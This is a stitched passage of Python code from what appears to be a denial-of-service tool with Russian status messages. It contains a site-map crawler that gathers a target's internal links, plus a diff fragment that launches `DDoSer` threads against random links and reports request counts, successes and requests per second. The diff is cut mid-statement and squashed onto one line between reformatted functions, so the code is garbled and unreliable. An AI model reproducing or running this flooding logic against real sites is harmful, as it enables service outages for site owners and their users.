def url_grab(full_url):
    """Return the list of internal links of a site, using an on-disk cache.

    The site map is cached in ``./maps/<full_url>``, one link per line. On a
    cache hit the file is read back; otherwise the site is crawled with
    ``link_extractor.extractor`` and the result is written to the cache.

    Args:
        full_url: Site address without the scheme, e.g. ``'192.168.56.102'``.
            ``'http://'`` is prepended before crawling, and the value is also
            used as the cache file name.

    Returns:
        A list of link strings. Both branches return a list so the caller can
        index it or pass it to ``random.choice``.
    """
    # Use the argument, not the module-level ``url`` the old body relied on.
    map_path = f'./maps/{full_url}'

    if os.path.exists(map_path):
        with open(map_path, 'r') as f:
            sub_urls = f.read().splitlines()
    else:
        # extractor() returns a set; turn it into a sorted list so the return
        # type matches the cached branch and the cache file has a stable order.
        sub_urls = sorted(
            link.strip()
            for link in link_extractor.extractor('http://' + full_url)
        )

        os.makedirs('./maps', exist_ok=True)
        # open(..., 'w') creates the file by itself, so os.mknod is not needed.
        with open(map_path, 'w') as f:
            for link in sub_urls:
                print(link, file=f)

    print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
    return sub_urls
progressbar.ProgressBar(max_value=requestCount) as bar: + for i in range(requestCount): + url = random.choice(subUrls) + thread = DDoSer(url) + thread.start() + thread.join() + bar.update(requestCountExecuted) + + while requestCountExecuted < requestCount: + bar.update(requestCountExecuted) + + print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted)) + print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess)) + print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с') diff --git a/link_extractor.py b/link_extractor.py new file mode 100644 index 0000000..e79330d --- /dev/null +++ b/link_extractor.py @@ -0,0 +1,117 @@ +# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor + +import requests +from urllib.request import urlparse, urljoin +from bs4 import BeautifulSoup +import colorama + +# init the colorama module +colorama.init() + +GREEN = colorama.Fore.GREEN +GRAY = colorama.Fore.LIGHTBLACK_EX +RESET = colorama.Fore.RESET + +# initialize the set of links (unique links) +internal_urls = set() +external_urls = set() + +total_urls_visited = 0 + + +def is_valid(url): + """ + Checks whether `url` is a valid URL. 
def get_all_website_links(url):
    """
    Returns the new links found on the page at `url` that belong to the same website.

    Every ``<a href>`` on the page is resolved against `url` and stripped of
    its query string and fragment. Links already present in the module-level
    `internal_urls` set are skipped. Links to other hosts are recorded in the
    module-level `external_urls` set. Same-site links are added to
    `internal_urls` and returned.

    params:
        url (str): absolute URL of the page to fetch.
    returns:
        set of same-site URLs seen for the first time on this page.
    """
    # all new same-site URLs found on `url`
    urls = set()
    # host of the page being scanned (lower-cased, without port)
    site_host = urlparse(url).hostname or ""
    # requests applies no timeout by default; bound the wait so a single
    # unresponsive page cannot hang the whole crawl
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.content, "html.parser")
    for a_tag in soup.findAll("a"):
        href = a_tag.attrs.get("href")
        if not href:
            # missing or empty href
            continue
        # resolve relative links against the page URL
        parsed_href = urlparse(urljoin(url, href))
        if parsed_href.scheme not in ("http", "https") or not parsed_href.netloc:
            # mailto:, javascript:, tel: and similar links cannot be crawled;
            # rebuilding them below would turn them into bogus "valid" URLs
            continue
        # remove URL GET parameters, URL fragments, etc.
        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
        if not is_valid(href):
            # not a valid URL
            continue
        if href in internal_urls:
            # already in the set
            continue
        # compare hosts rather than searching for the domain anywhere in the
        # URL, so "http://other.site/<domain>" is not mistaken for internal
        link_host = parsed_href.hostname or ""
        same_site = link_host == site_host or link_host.endswith("." + site_host)
        if not same_site:
            # external link
            if href not in external_urls:
                print(f"{GRAY}[!] External link: {href}{RESET}")
                external_urls.add(href)
            continue
        print(f"{GREEN}{href}{RESET}")
        urls.add(href)
        internal_urls.add(href)
    return urls
def extractor(url):
    """
    Crawls the website starting at `url` and returns its internal links.

    The crawl state kept at module level (`internal_urls`, `external_urls`,
    `total_urls_visited`) is reset first, so every call starts from scratch.
    Without the reset, a second call in the same process would mix links from
    different sites and stop early, because the visit counter would already be
    near or over the `max_urls` limit used by `crawl`.

    params:
        url (str): absolute URL to start crawling from.
    returns:
        a new set with the internal URLs found during this crawl.
    """
    global total_urls_visited

    # clear in place: get_all_website_links() reads these same set objects
    internal_urls.clear()
    external_urls.clear()
    total_urls_visited = 0

    crawl(url)

    # hand back a copy so callers cannot mutate the module's crawl state
    return set(internal_urls)